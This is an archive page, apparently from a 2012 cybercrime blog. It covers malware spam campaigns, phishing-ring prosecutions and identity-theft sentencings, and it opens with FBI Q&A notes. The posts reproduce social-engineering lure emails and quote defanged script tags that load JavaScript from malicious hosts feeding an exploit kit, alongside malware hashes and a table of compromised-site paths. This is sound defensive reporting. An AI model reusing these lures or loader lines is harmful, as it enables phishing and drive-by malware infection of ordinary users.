A: There has been dramatic progress in how law enforcement addresses these issues. We are doing much better on not victimizing victims. There were big cases before I got there, a Citibank case ???? (42:15) ??? there were stories early on when the FBI came in and in order to preserve the data we seized the computers. We fixed that right away. We didn't keep repeating that, although the stories continue. We also stopped naming the victims so often. Working with the private sector better. The other issue, a Cuckoo's Egg issue back to Clifford Stoll, where someone says there has been a victimization and you ask how much the damage is and its neglible, 75 cents, you hang up and laugh. (Gar-note: Clifford really did report that someone had used 75 cents of computer time, and then had changed the logs to hide it.) The damage is not obvious, but the threat to infrastructure represented by these intrusions are real. You don't have to wait for a big dollar loss to take an attack seriously. The third area of change is taking information IN THE COURSE Of the investigation, and using that information to help protect victims while the case is still active. Back in the NIPC days, we would literally get on a stage and tell private sector what we knew while proceeding with the investigation. I hear all the time that the FBI wants to keep the problem happening so they can monitor the crime and don't care about the victim. We've done a better job helping law enforcement provide value to the Net Defender while we are proceding against the adversaries.

Q: When we first started, every FBI dude would stand up and say "I don't really understand these computers, I have to ask my granddaughter to help me ..." and every FBI dude would get up and start the pitch that way - but I remember the first time I heard Steve with Kim Perretti talk and realize they really get this stuff.

A: We started really hiring towards this hiring pool. In the 90s we hired attorneys and CPAs for the agent role, but then over time began hiring very brilliant people, who work for major companies patriotic people who sometimes take a cut of 2/3rds of their salaries. We created a career path oriented towards cyber, with 30 unique courses that are evaluated constantly to make sure they are timely.

A: In dealing the victims, we only identified in the Mitnick case the victims by their initials. Bloomberg had a hacker try to extort them, and he came to the FBI and said "screw them, I want to send the message that you can't come threaten me like this." Bloomberg met the guy in London with $250,000 with two of his colleagues who were actually a Metropolitan Police officer and an FBI agent who proceeded to lock up these two Kazikstanis and bring them back to New York. (See: Zezov case for details)

Q&A Session

Friday, May 18, 2012

Social Engineering: Facebook Photo

Please welcome a guest-blogger, Sarah Turner, who authored today's report. Sarah is a malware analyst in the UAB Computer Forensics Research Laboratory and is the editor of our daily "Emerging Threats By Email" report. I asked her to put together an article about a prevalent spam campaign that has been running wild for about a month now. While the HISTORICAL malware described below is fairly well detected, each morning when a new version has come out the detection has been low, with improvement over the next 24-48 hours. If you see a message like this, RESIST TEMPTATION! DO NOT CLICK!


Social Engineering: Facebook Photo

Guest blogger: Sarah Turner

This campaign utilizes social engineering containing subject lines that insinuate a photo is enclosed that was obtained from a social media site or public domain depicting the recipient or the ex girlfriend of the recipient in a scandalous or otherwise embarrassing predicament.

The campaign only uses 8 subjects, shown below.

  • FW:Check the attachment you have to react somehow to this picture
  • FW:They killed your privacy man your photo is all over facebook! NAKED!
  • FW:Why did you put this photo online?
  • FW:You HAVE to check this photo in attachment man
  • RE:Check the attachment you have to react somehow to this picture
  • RE:They killed your privacy man your photo is all over facebook! NAKED!
  • RE:Why did you put this photo online?
  • RE:You HAVE to check this photo in attachment man

The email body can vary between the 3 samples shown below:

I have a question-have you seen this picture of yours in attachment?? Three facebook friends sent it to me today...why did you put it online? wouldn't it harm your job? what if parents see it? you must be way cooler than I thought about you man :))))

Hate to bother you,
But I really need to ask you - is it you at this picture in attachment? I can't tell you where I got this picture it doesn't actually matter...The question is is it really you???.

I'm sorry,
I got to show you this picture in attachment. I can't tell who gave it to me sorry but this chick looks a lot like your ex-gf. But who's that due??.

all of which encourage the recipient to open the attachment and see the image to which they’re referring. Typically the attachment is in the form of a .ZIP containing an executable, however the attachments received on May 16, 17, and 18, the attachment extension was not as a .ZIP but as “.jpg.exe”.

The first few times this malware was received (April 20 – 23), once it was downloaded and prompted to run, it acted as an AntiVirus Software.

After that, the received malware was identified as Cutwail delivering Zeus. The executable would be prompted to run and there would be no recordable network traffic but multiple changes would be made to your Registry and a new file, named svchost.exe would be added to your computer. The executable received today had a detection of XXXX on Virus Total.

UAB has 11 prominent MD5’s associated with this campaign (and a couple mis-formed files)

count md5_hex
24998  b42cf3d2cc829aba1e771f9517b2b97d (38 of 41 detects at VirusTotal)
21754  57f40166fd7cafe84ef51fe5f7776c51 (21 of 41 detects at VirusTotal)
21011  77e7fc1b2addc8ee5ea74e3592d4ab89 (14 of 41 detects at VirusTotal)
14918  76e144a572b4c52e3ddb8bd860dfbdd9 (36 of 41 detects at VirusTotal)
9562  5dea03a160543724d7cf4adda93a28ae (36 of 41 detects at VirusTotal)
9138  061f96cf8f7713d17e580900ba20c6b4 (31 of 42 detects at VirusTotal)
8286  9badf88e346bd0530d4e5248d2bb2f35 (37 of 42 detects at VirusTotal)
6362  d60bfa876dc382908fbcde1c96d5b95f (36 of 42 detects at VirusTotal)
5604  bf7b30a96dc8be8bbfb826158afb2379 (34 of 42 detects at VirusTotal)
4742  8cc36756d15560335ed53c47bd7cbc5e (36 of 42 detects at VirusTotal)
2538  d6f05da06a26d9d731273a0fa26dd7e1 (12 of 42 detects at VirusTotal)
This campaign was seen for the first time on 4/20/12 and was the top campaign seen today. Below is the full list of days and receipt counts from prior to this week.
receiving_date count
----------------        ------
 2012-04-20      6372
 2012-04-21      20819
 2012-04-22      3182
 2012-04-23      5739
 2012-04-29      14918
 2012-05-03      9252
 2012-05-04      308
 2012-05-06      2
 2012-05-07      9138
 2012-05-08      8286
 2012-05-08      13
 2012-05-11      1279
 2012-05-12      4325
 2012-05-16      7260
 2012-05-17      17053
 2012-05-17      13751
 2012-05-18      4701
 2012-05-18      2538
We have seen at least 6,757 unique IP addresses used to send us copies of this email with one of these malware attachments. When the malware is fresh, as it is each morning in the Emerging Threats By Email report, the detection rates are much lower. For example, here is the status from the May 17th Emerging Threats By Email report: So, yesterday morning when the report was written, that version of the malware had 7 detects, although as of this writing it has 14.

Nichole Michelle Merzi of Operation Phish Phry gets 5 years

Back in 2009, this blog ran the story FBI's Biggest Domestic Phishing Bust documenting Operation Phish Phry and explaining what was then known of the structure of an international phishing operation with more than 100 members. Yesterday Nichole Michelle Merzi, one of the ring-leaders, was finally sentenced to five years:
Defendant is committed on Counts 1, 34, 35, 38, 39, 48, and 51 of the Indictment to the Bureau of Prisons for 36 months. This term consists of 36 months on each of Counts 1, 34, 35, 38, 39, and 51; 36 months on Count 48, to be served concurrently; and 24 months on Count 46, to be served consecutively; for a total of 60 months. Defendant shall receive credit for any time served. Supervised release for three years.
The case began all the way back on September 30, 2009 with the filing of an indictment that charged:
  • Kenneth Joseph Lucas (1) count(s) 1-9,
  • Nichole Michelle Merzi (2) count(s) 1,
  • Jonathan Preston Clark (3) count(s) 1,
  • Jarrod Michael Akers (4) count(s) 1,
  • Kyle Wendell Akers (5) count(s) 1,
  • Wayne Edwards Arbaugh (6) count(s) 1-2,
  • Demorris Brooks (7) count(s) 1,
  • Antonio Late Colson (8) count(s) 1,
  • Kenneth Crews (9) count(s) 1,
  • Manu T Fifita (10) count(s) 1,
  • Jennifer Anabelle Lopez Gonzalez (11) count(s) 1, 7-9,
  • Tinika Sabrina Gunn (12) count(s) 1,
  • Jason Marcellus Jenkins (13) count(s) 1,
  • Sylvia Johnson (14) count(s) 1,
  • Remar Ahmir Lawton (15) count(s) 1,
  • Kyle Brandon Martin (16) count(s) 1,
  • Franklin Anthony Ragsdale (17) count(s) 1, 4-6,
  • Steven Aaron Saunders (18) count(s) 1,
  • Rynn Spencer (19) count(s) 1,
  • Raquel Raffi Varjabedian (20) count(s) 1,
  • Candace Marie Zie (21) count(s) 1,
  • Ashley A Ager (22) count(s) 1,
  • Latina Shaneka Black (23) count(s) 1,
  • Michael Dominick Gunn Dacosta, Jr (24) count(s) 1,
  • Virgil Phillip Daniels (25) count(s) 1,
  • Tramond S Davis (26) count(s) 1,
  • Shontovia D Debose (27) count(s) 1,
  • Joshua Vincent Fauncher (28) count(s) 1,
  • Krystal Fontenot (29) count(s) 1,
  • Anthony Donnel Fuller (30) count(s) 1, 5-6,
  • Michael Christopher Grier (31) count(s) 1,
  • Bryanna Harrington (32) count(s) 1,
  • Shawn K Jordan (33) count(s) 1-3,
  • Billy Littlejohn Kelly (34) count(s) 1,
  • Reggie B Logan, Jr (35) count(s) 1,
  • Ikinasio Lousiale, Jr (36) count(s) 1,
  • Raymond V Mancillas (37) count(s) 1,
  • David P Mullin (38) count(s) 1,
  • Vincent Nguyen (39) count(s) 1,
  • Ario Plogovii (40) count(s) 1,
  • Brandon R Ross (41) count(s) 1,
  • Alan Elvis St. Pierre (42) count(s) 1,
  • Courtney Monet Sears (43) count(s) 1,
  • Me Arlene Settle (44) count(s) 1,
  • Paula W Sims (45) count(s) 1,
  • Jamie Smith (46) count(s) 1,
  • Brandon Kyle Thomas (47) count(s) 1,
  • Christopher Uhamaka (48) count(s) 1,
  • James Michael Viorato (49) count(s) 1,
  • Jovon Darnell Weems (50) count(s) 1,
  • David D Westbrooks (51) count(s) 1,
  • Bridget Deque Wilkins (52) count(s) 1,
  • Marcus Deshaun Williams (53) count(s) 1.

In a conspiracy, we have to show "Overt Acts" committed by each member of the conspiracy in support of the conspiracy, which is how we end up with an 86 page Operation Phish Phry Indictment.

The indictment charges:

18 USC § 134: Wire and Bank Fraud Conspiracy
18 USC § 1344(1): Bank Fraud
18 USC § 1028A: Aggravated Identity Theft
18 USC § 371: Computer Fraud Conspiracy
18 USC § 1030(a)(4): Computer Fraud
18 USC § 1956(h): Money Laundering Conspiracy
§ 2: Aiding and Abetting and Causing an Act to Be Done

There are 335 Overt Acts charged in the Indictment, such as:

Overt Act No. 14: On July 31, 2008, defendant ZIE sent an SMS message to defendant LUCAS, in Los Angeles County, to transmit the account number and account holder name for the one checking account and one savings account that unindicted coconspirator K.M. opened that day at BOA, which transmission was for the purpose of causing defendant LUCAS, to make and to cause an unauthorized transfer of funds to those accounts and for the purpose of allowing unindicted coconspirator K.M. to withdraw the transferred funds.

Overt Act No. 16: On July 31, 2008, in Los Angeles County, defendant LUCAS caused a computer transfer of funds from a victim bank account at BOA, which neither BOA nor the victim had authorized, into defendant LOGAN's checking and savings accounts.

(In Overt Acts 17 and 18 Logan then withdraws $900 of that money from checking and $400 from savings.)

Overt Act No 70: On August 20, 2008, in Los Angeles County, defendant LUCAS caused computer transfers of $350 from a victim bank account at BOA, which neither BOA nor the victim had authorized, into defendant NGUYEN's checking account and $1,200 from a victim bank account at BOA, which neither BOA nor the victim had authorized, into defendant NGUYEN's savings account.

Overt Act No. 181: On December 11, 2008, in Los Angeles County, defendant JENKINS drove unindicted coconspirator A. J. to a Wells Fargo bank branch located in Los Angeles County to withdraw the $1,000 that defendant LUCAS caused to be deposited into unindicted coconspirator A.J.'s savings account.

Overt Act No. 186: On December 16, 2008, during a telephone conversation with defendant LUCAS< defendant MERZI advised defendant LUCAS that she had caused an unindicited coconspirator to conduct a transfer of funds from a victim bank account at Wells Fargo, which neither Wells Fargo nor the victim had authorized, and next would cause an unauthorized transfer of funds from a victim BOA account.

Overt Act No. 237: On June 14, 2007, in Los Angeles Cou8nty, defendant K. AKERS transmitted $1,900 by Western Union to unindicted coconspirator E. A.

It goes on like that for some 60 pages. From January 2007 to September 2009, the Ringleaders get victim credentials, the second tier transfer the funds around to accounts opened and controlled by the third tier, who then get driven around and sent into banks to take out the money, which gets passed up through management and wired via Western Union to Egypt, with everyone taking a piece of the pie.

For those who are interested in how you argue such a case in court, I've also posted the Operation Phish Phry Closing Arguments Power Point. Hundreds of pages of courtroom transcripts are also available from PACER.

Thursday, May 10, 2012

IRS Identity Theft leads to 25 year Sentence for Alabama Fraudsters

The news in Alabama today is that IDENTITY THEFT DOES NOT PAY. Veronica Dale of Montgomery, Alabama was sentenced to 334 months in prison and Alchico Grant of Lowndes County, Alabama was sentenced to 310 months in prison after the two participated in a scheme to file more than 500 fraudulent tax returns and steal from the IRS $3,741,908! The two will also have to pay $2.8 Million in restitution.

The sentences were announced on the main Department of Justice website with the title Leaders of Multi-million Dollar Fraud Ring That Used Stolen Information of Medicaid Recipients Each Sentenced to Over 25 Years in Prison

The charges brought against Veronica Dale include:

CR. NO: 2:10-CR-242-MEF (see see Indictment

18 USC § 286: Conspiracy to Defraud the Government
18 USC § 287: False, Fictitious or Fraudulent Claims
18 USC § 641: Theft of Government Public Money, Property or Records
18 USC § 1028A: Aggravated Identity Theft

CR. NO: 2:11-CR-69-MEF (see see Indictment

18 USC § 1343: Wire Fraud
18 USC § 1028A: Aggravated Identity Theft

In the first case, the defendants were:

Veronica Denise Dale
Alchico Dewayne Grant
Laquanta Grant
Isaac C. Dailey
Leroy Howard

In a superseding indictment filed for crimes that occurred after the first case was already underway, the defendants were:

Melinda Renae Clayton
Alchico Dewayne Grant
Veronica Denise Dale
Stephanie Adams
Valerie Byrd

Veronica owned and operated Dale's Tax Service, a tax preparation business located in Montgomery, Alabama. Looking back, it is likely that opening the Tax Service was just part of the plan to commit these crimes.

Veronica obtained Social Security numbers and names and used them to prepare and file false income tax returns and directed tax refunds to be deposited into accounts controlled by her and her co-defendants.

The bank accounts received at least $2.3 million in tax refunds.

1/21/2009 $4,990
2/14/2009 $5,124
3/6/2009 $7,352
3/15/2009 $10,688
3/15/2009 $10,031
3/15/2009 $10,332>
3/24/2009 $10,636
etc. etc. (the indictment lists 26 filings, but this happened well over 500 times!) Money was deposited into accounts opened in 2008, 2009, and 2010 at Regions Bank in Montgomery, Alabama and Woodforest Bank in Montgomery, Alabama, as well as Alabama State Employees Credit Union, MAX Credit Union. In 2011 additional accounts were opened at Bank of America where several more tax returns were received.

Veronica turned herself in to US Marshall Service on December 17, 2010. Here is the amazing part. AFTER TURNING HERSELF IN, and being released on bail pending trial, SHE KEPT STEALING MONEY FROM THE IRS!!!

The second case (2:11-CR-69-MEF) explains that between approximately January 2011 and April 2011, Dale conspired with Melinda Clayton and others to file an ADDITIONAL 155 fraudulent tax returns, to gather another $494,424 in tax refunds. THIS WAS AFTER DALE HAD ALREADY TURNED HERSELF IN because of the charges in the other case! She "caused to be stored at Clayton's residence thousands of names and social security numbers unlawfully obtained from EDS."

She pleaded guilty October 14, 2011.

The guilty plea (see see the Plea Agreementincludes the fact that "on counts 1,9,10,27 and 28, a 6-level enhancement is warranted because the Defendant's direct participation in the offense involved 250 or more victims.

The guilty plea explains that "Between June 2007 and February 2008, the Defendant worked as a temporary employee at EDS in Montgomery, Alabama. She "was able to and did wrongfully and illegally acquire Medicaid records which included the names, social security numbers, and dates of births of thousands of inviduals who received Medicaid benefits.

Between January 2009 and December 2010, she used these records stolen from EDS to file over 500 false tax returns.

308 of those tax retunrs deposited money into accounts of the Alabama State Employees Credit Union controlled by Betty Washington. The accounts received approximately $1,440,632.40 in false tax refunds.

Friday, May 04, 2012

Waya Nwaki pleads guilty in globe-spanning phishing ring

We often hear complaints from our Banking friends about criminals in Nigeria. Today's story is another example of the truth that in 2012, there is no place left to hide. Back in April 2011, FBI New Jersey presented their case to the Grand Jury in the form of a sealed indictment accusing several criminals of phishing:

Karlis Karklins
Charles Umeh Chidi
Waya Nwaki (AKA Prince Abuja, AKA USAPrince12k)
Osarhieme Uyi Obaygbona (AKA bside)
Marvin Dion HIll (AKA Nyhiar Da Boss, AKA Nihiar Springs)
Alphonsus Osuala
Olaniyi Jones

The case was officially unsealed on January 20, 2012, as the suspects were rounded up, chiefly Olaniyi Jones Makinde, who was arrested that week in Lagos, Nigeria:

(click for original in

Romance: Nigeria Style

Although this is what would normally be thought of as a "Nigerian Scam Ring" many of the players were already in the United States and had been for some time. Olaniyi, pictured above, is better known to Americans as his romantic alter ego, Brenda Stuart (, age 35, London, b.Feb 21, 1977)

"Brenda" would "fall in love" with various men that "she" met online, and then have various financial hardships which required the men to send money to her overseas accounts. Several "Money Mules" (called "Maga" in the Nigerian lingo) would assist with getting the money back to Jones via Western Union or Moneygram.

According to BekkyBlog Olaniyi Victor Makinde, also known as Andrea Bradley and Olaniyi Jones was originally arrested on September 6, 2011 by FBI agents working with Nigerian authorities on charges brought by the San Francisco division of the FBI related to two marriage scams where he harvested $620,225.04 from two American victims, Marilou Sibbaluca and John Massoni. While waiting in the Olokuta medium prison, he was charged again in the current New Jersey case. According to the blogger, Olanyiy was a recent graduate of the University of Ado Ekiti.

Criminal History in US

Waya Nwaki and Alphonsis Osuala should have been fairly easy to find. Rather than being in Nigeria, they were already in prison in Georgia. They had been arrested in Belvedere, South Carolina all the way back in April 20, 2005. They recruited a "white guy", Douglas Hudson, to go into a bank and cash a check for $2950 in a Bank of America branch while they waited outside in their silver Lincoln Navigator. Later that day they did the same scam, using a copy of the same check, in Aiken, South Carolina. Aiken, who was carrying a counterfeit resident alien card in the name of Steven Ratzlaff, was arrested in the bank by Lieutenant Farmer of the Aiken Department of Public Safety, while his colleague Officer Wilson pulled over the suspicious Lincoln Navigator and searched it, finding $17,000 in cash under the driver's seat, and a fake soda can containing six more copies of the same check. Nwaki was paying Hudosn $500 for each check they succesfully cashed, and theat they had done five successful scams in the previous two days. After being released, they were apparently back on the street for a while before being rearrested in Georgia.


The more recent scams were pure phishing. The six US-based codefendants worked with Jones to steal money from Payroll Processors ADP and Intuit as well as several banks. Karklins and Chidi would email phishing and spear-phishing attacks to the banking customers to lure them to phishing sites - fake bank websites that would be used to gather login credentials. As has been a growing trend, some of the credentials were used to do telephone transactions with the banks, instead of trying to use their online systems, which often have more fraud protection in place. Once the money was available, the criminals sent wire transfers to bank accounts in the United States, Mexico, the United Kingdom, Latvia, France, Bulgaria, Russia, and Nigeria. $3.5 million in wire transfers were attempted and $1.3 million were successfully withdrawn. This activity spanned a couple years, beginning at least as early as November 2009, when Karklins was setting up Chase Bank phishing sites. In January 2010 they added an ADP scam, and successfully harvested credentials for at least 27 sets of userids and passwords. These Payroll accounts allowed them to establish imaginary employees in various companies who received payments along with the real employees each payday until they were discovered. Karklins and Chidi would email Nwaki credentials for high value phishing accounts that they came across so that Nwaki could gather the money. It seems they ignored low value balances and focused only on taking the money from the high value accounts. Notices would go to Nwaki such as "28k chase, male, login yourself for check copy." or "CHASE 13.8k = male, age 32" or "BOA Business 25k + mail access". In February 2010, an Regions Bank account operated by defendant Hill was used to wire money to Bulgaria and Latvia. Nwaki also provided login credentials for a "50k drop" that was sent to the Regions account. Of the more than $1.3 million stolen, more than $300,000 of the funds were sent to a J.M. Sovereign Account operated by Jones in Nigeria.

Tuesday, May 01, 2012

Paypal "You Just Sent a Payment" spam leads to malware

A new malicious spam campaign has just launched this morning targeting Paypal users. This malware campaign attempts to "social engineer" users into clicking a link that they know they shouldn't click on! Here's the email:

The criminals believe (and from what we've seen, correctly) that when presented with the news that you just sent $100 to someone from your Paypal account, you will have a panic reaction and click on the link in the email. This is what they are counting on!

As you can see we got quite a few of these this morning:

The destination is NOT going to be Paypal. Don't click on the link, and tell your friends not to click on the link either! If they do, a bad set of malicious actions are set into motion.

This particular version of the campaign just started about 2.5 hours ago. Here are the number of messages we have seen so far:

 count |        mbox         
    22 | 2012-05-01 04:00:00
    22 | 2012-05-01 04:15:00
   312 | 2012-05-01 04:30:00
    41 | 2012-05-01 04:45:00
    15 | 2012-05-01 05:00:00
    78 | 2012-05-01 05:15:00
   241 | 2012-05-01 05:30:00
     1 | 2012-05-01 05:45:00
   210 | 2012-05-01 06:00:00
    91 | 2012-05-01 06:15:00
(10 rows)
There are many hundreds of links that may have been advertised in your copy of this email, but don't click on ANY of them!

In the example case that we checked, we followed a link to "" (yes, we like irony).

When the web page was visited, it immediately executed two remote javascript files (I've added spaces to "break" them):

script type="text/javascript" src="http:// laxana .org /1VxMC4Dy /js .js"
script type="text/javascript" src="http:// womaametw3 .com /CWTKosSw /js .js"
which redirected to an Exploit server that displayed this "Please Wait" sign while something more malicious was happening in the background.

The exploit kit dropped a Java "JAR" file that was launched in Java, taking advantage of a security hole, which then caused another executable file to download and install on the computer.

What was that executable? We're not sure yet, but your anti-virus product probably doesn't know either. At the time we submitted the malware to VirusTotal there were only 5 of 43 anti-virus products could label the malware as malicious. Although McAfee called it "Zbot" (PWS-Zbot.gen.ya, the anti-virus name for the Zeus Bot) Avast and one other vendor called it "Karagany" (Win32:Karagany-FS [Trj]).

The malware's MD5 was 4f58895af2b8f89bd90092f08fcbd54f and it was 33280 bytes in size.

Here's a link to the original VirusTotal report.

Previous Threats

This link is very closely linked to a "LinkedIn" spam campaign from yesterday. That campaign functioned in exactly the same manner, with the difference only in the spam campaign.

All of the domains listed below have been compromised by an attacker. Most likely the criminals have stolen the FTP userid and password of the criminal, allowing them to change the webmaster's content without the webmaster's knowledge. If you control or know the owner of one of these websites, let them know they have been hacked. They need to remove the content, scan any computers they use to access their website for malware, and change their password AFTER they get the malware cleaned up.

            machine            |         path         
-------------------------------+----------------------                  | /rHFbxKTn/index.html                 | /bp9ksV54/index.html                 | /N2rhmW5i/index.html                 | /r1kVYAfU/index.html                 | /vpW8hoZ6/index.html                   | /BzJoVeo0/index.html                   | /Lskx0Bew/index.html                   | /NdHgm0gT/index.html                   | /oZFZ0qJK/index.html                   | /pD2zHbBB/index.html                   | /vpW8hoZ6/index.html                   | /wcE0aK0J/index.html                   | /wjivLtgo/index.html               | /4RcYf6gB/index.html               | /7QLZuMme/index.html               | /bp9ksV54/index.html               | /BzJoVeo0/index.html               | /ErmgUouT/index.html               | /gj1W42Ee/index.html               | /i8ztSS5H/index.html               | /iaJ7FSBi/index.html               | /mKvc8Mh7/index.html               | /N2rhmW5i/index.html               | /NdHgm0gT/index.html               | /oZFZ0qJK/index.html               | /pD2zHbBB/index.html               | /rHFbxKTn/index.html               | /rzDZAsw7/index.html               | /t7xYVUJE/index.html               | /tLnW6jJT/index.html               | /UAtkgmot/index.html               | /UcL29wrU/index.html               | /vpW8hoZ6/index.html               | /wtQ8G0Ku/index.html               | /YhwvXGhk/index.html               | /zvo8ioak/index.html         | /4RcYf6gB/index.html         | /7NEM56yQ/index.html         | /7QLZuMme/index.html         | /bp9ksV54/index.html         | /BzJoVeo0/index.html         | /ddLvpeMu/index.html         | /DkM4v1PP/index.html         | /gj1W42Ee/index.html         | /N2rhmW5i/index.html         | /oZFZ0qJK/index.html         | /r1kVYAfU/index.html         | /Re3BMGVG/index.html         | /rHFbxKTn/index.html         | /RoScD8aq/index.html         | /rzDZAsw7/index.html         | /UAtkgmot/index.html         | /vpW8hoZ6/index.html         | /wjivLtgo/index.html         | /wtQ8G0Ku/index.html         | /YhwvXGhk/index.html         | /zvo8ioak/index.html               | /4RcYf6gB/index.html               | /7NEM56yQ/index.html               | /7QLZuMme/index.html               | /ErmgUouT/index.html               | /gj1W42Ee/index.html               | /mKvc8Mh7/index.html               | /NdHgm0gT/index.html               | /oZFZ0qJK/index.html               | /pSG1s2xs/index.html               | /Re3BMGVG/index.html               | /rzDZAsw7/index.html               | /t7xYVUJE/index.html               | /tLnW6jJT/index.html               | /UAtkgmot/index.html               | /UcL29wrU/index.html               | /wcE0aK0J/index.html               | /xXr3khjG/index.html   | /4RcYf6gB/index.html   | /bp9ksV54/index.html   | /ddLvpeMu/index.html   | /DkM4v1PP/index.html   | /gj1W42Ee/index.html   | /i8ztSS5H/index.html   | /iaJ7FSBi/index.html   | /Lskx0Bew/index.html   | /mKvc8Mh7/index.html   | /N2rhmW5i/index.html   | /NdHgm0gT/index.html   | /oZFZ0qJK/index.html   | /pD2zHbBB/index.html   | /pSG1s2xs/index.html   | /r1kVYAfU/index.html   | /Re3BMGVG/index.html   | /rHFbxKTn/index.html   | /rzDZAsw7/index.html   | /UcL29wrU/index.html   | /wcE0aK0J/index.html   | /wjivLtgo/index.html   | /wtQ8G0Ku/index.html    | /ddLvpeMu/index.html    | /Lskx0Bew/index.html    | /oZFZ0qJK/index.html    | /pSG1s2xs/index.html    | /wjivLtgo/index.html     | /4RcYf6gB/index.html     | /6BrzkppT/index.html     | /7NEM56yQ/index.html     | /7QLZuMme/index.html     | /bp9ksV54/index.html     | /BzJoVeo0/index.html     | /ddLvpeMu/index.html     | /DkM4v1PP/index.html     | /ErmgUouT/index.html     | /gj1W42Ee/index.html     | /i8ztSS5H/index.html     | /iaJ7FSBi/index.html     | /Lskx0Bew/index.html     | /mKvc8Mh7/index.html     | /NdHgm0gT/index.html     | /oZFZ0qJK/index.html     | /pD2zHbBB/index.html     | /pSG1s2xs/index.html     | /rHFbxKTn/index.html     | /RoScD8aq/index.html     | /rzDZAsw7/index.html     | /t7xYVUJE/index.html     | /tLnW6jJT/index.html     | /UAtkgmot/index.html     | /UcL29wrU/index.html     | /vpW8hoZ6/index.html     | /wcE0aK0J/index.html     | /wjivLtgo/index.html     | /wtQ8G0Ku/index.html           | /4RcYf6gB/index.html           | /6BrzkppT/index.html           | /7NEM56yQ/index.html           | /7QLZuMme/index.html           | /bp9ksV54/index.html           | /ddLvpeMu/index.html           | /DkM4v1PP/index.html           | /ErmgUouT/index.html           | /gj1W42Ee/index.html           | /Lskx0Bew/index.html           | /N2rhmW5i/index.html           | /NdHgm0gT/index.html           | /oZFZ0qJK/index.html           | /pD2zHbBB/index.html           | /r1kVYAfU/index.html           | /rHFbxKTn/index.html           | /RoScD8aq/index.html           | /rzDZAsw7/index.html           | /t7xYVUJE/index.html           | /UAtkgmot/index.html           | /vpW8hoZ6/index.html           | /wcE0aK0J/index.html           | /wtQ8G0Ku/index.html           | /xXr3khjG/index.html           | /YhwvXGhk/index.html           | /zvo8ioak/index.html          | /4RcYf6gB/index.html          | /7NEM56yQ/index.html          | /7QLZuMme/index.html          | /ddLvpeMu/index.html          | /DkM4v1PP/index.html          | /gj1W42Ee/index.html          | /Lskx0Bew/index.html          | /mKvc8Mh7/index.html          | /N2rhmW5i/index.html          | /NdHgm0gT/index.html          | /oZFZ0qJK/index.html          | /pD2zHbBB/index.html          | /pSG1s2xs/index.html          | /r1kVYAfU/index.html          | /Re3BMGVG/index.html          | /rHFbxKTn/index.html          | /RoScD8aq/index.html          | /rzDZAsw7/index.html          | /t7xYVUJE/index.html          | /UAtkgmot/index.html          | /UcL29wrU/index.html          | /vpW8hoZ6/index.html          | /wcE0aK0J/index.html          | /wjivLtgo/index.html          | /wtQ8G0Ku/index.html          | /xXr3khjG/index.html            | /4RcYf6gB/index.html            | /6BrzkppT/index.html            | /7NEM56yQ/index.html            | /7QLZuMme/index.html            | /bp9ksV54/index.html            | /BzJoVeo0/index.html            | /DkM4v1PP/index.html            | /ErmgUouT/index.html            | /gj1W42Ee/index.html            | /i8ztSS5H/index.html            | /iaJ7FSBi/index.html            | /Lskx0Bew/index.html            | /mKvc8Mh7/index.html            | /N2rhmW5i/index.html            | /pD2zHbBB/index.html            | /pSG1s2xs/index.html            | /r1kVYAfU/index.html            | /Re3BMGVG/index.html            | /RoScD8aq/index.html            | /t7xYVUJE/index.html            | /tLnW6jJT/index.html            | /UAtkgmot/index.html            | /UcL29wrU/index.htm            | /UcL29wrU/index.html            | /vpW8hoZ6/index.html            | /wcE0aK0J/index.html            | /wjivLtgo/index.html            | /xXr3khjG/index.html            | /YhwvXGhk/index.html            | /zvo8ioak/index.html                    | /6BrzkppT/index.html                    | /7NEM56yQ/index.html                    | /BzJoVeo0/index.html                    | /ddLvpeMu/index.html                    | /ErmgUouT/index.html                    | /gj1W42Ee/index.html                    | /i8ztSS5H/index.html                    | /iaJ7FSBi/index.html                    | /Lskx0Bew/index.html                    | /mKvc8Mh7/index.html                    | /N2rhmW5i/index.html                    | /NdHgm0gT/index.html                    | /oZFZ0qJK/index.html                    | /pD2zHbBB/index.html                    | /pSG1s2xs/index.html                    | /r1kVYAfU/index.html                    | /Re3BMGVG/index.html                    | /rHFbxKTn/index.html                    | /RoScD8aq/index.html                    | /rzDZAsw7/index.html                    | /t7xYVUJE/index.html                    | /tLnW6jJT/index.html                    | /UAtkgmot/index.html                    | /UcL29wrU/index.html                    | /vpW8hoZ6/index.html                    | /wcE0aK0J/index.html                    | /wjivLtgo/index.html                    | /wtQ8G0Ku/index.html                    | /xXr3khjG/index.html                    | /YhwvXGhk/index.html                     | /4RcYf6gB/index.html                     | /7QLZuMme/index.html                     | /BzJoVeo0/index.html                     | /ddLvpeMu/index.html                     | /DkM4v1PP/index.html                     | /ErmgUouT/index.html                     | /gj1W42Ee/index.html                     | /Lskx0Bew/index.html                     | /mKvc8Mh7/index.html                     | /N2rhmW5i/index.html                     | /NdHgm0gT/index.html                     | /r1kVYAfU/index.html                     | /Re3BMGVG/index.html                     | /rHFbxKTn/index.html                     | /RoScD8aq/index.html                     | /rzDZAsw7/index.html                     | /tLnW6jJT/index.html                     | /UAtkgmot/index.html                     | /UcL29wrU/index.html                     | /vpW8hoZ6/index.html                     | /wcE0aK0J/index.html                     | /wjivLtgo/index.html                     | /wtQ8G0Ku/index.html                     | /xXr3khjG/index.html                     | /YhwvXGhk/index.html                     | /zvo8ioak/index.html | /6BrzkppT/index.html | /7NEM56yQ/index.html | /ddLvpeMu/index.html | /DkM4v1PP/index.html | /ErmgUouT/index.html | /gj1W42Ee/index.html | /iaJ7FSBi/index.html | /Lskx0Bew/index.html | /mKvc8Mh7/index.html | /oZFZ0qJK/index.html | /pD2zHbBB/index.html | /pSG1s2xs/index.html | /Re3BMGVG/index.html | /rHFbxKTn/index.html | /RoScD8aq/index.html | /rzDZAsw7/index.html | /t7xYVUJE/index.html | /UcL29wrU/index.html | /xXr3khjG/index.html | /YhwvXGhk/index.html | /zvo8ioak/index.html        | /4RcYf6gB/index.html        | /6BrzkppT/index.html        | /bp9ksV54/index.html        | /BzJoVeo0/index.html        | /ddLvpeMu/index.html        | /DkM4v1PP/index.html        | /gj1W42Ee/index.html        | /i8ztSS5H/index.html        | /iaJ7FSBi/index.html        | /mKvc8Mh7/index.html        | /N2rhmW5i/index.html        | /NdHgm0gT/index.html        | /oZFZ0qJK/indexhtml        | /oZFZ0qJK/index.html        | /pD2zHbBB/index.html        | /pSG1s2xs/index.html        | /r1kVYAfU/index.html        | /rHFbxKTn/index.html        | /RoScD8aq/index.html        | /rzDZAsw7/index.html        | /UAtkgmot/index.html        | /UcL29wrU/index.html        